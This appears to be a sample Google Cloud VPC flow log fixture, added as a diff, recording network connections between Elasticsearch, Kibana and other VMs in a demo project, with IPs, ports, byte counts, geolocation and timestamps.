+{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"67.43.156.13","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"67.43.156.13","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"67.43.156.13","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"67.43.156.13","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 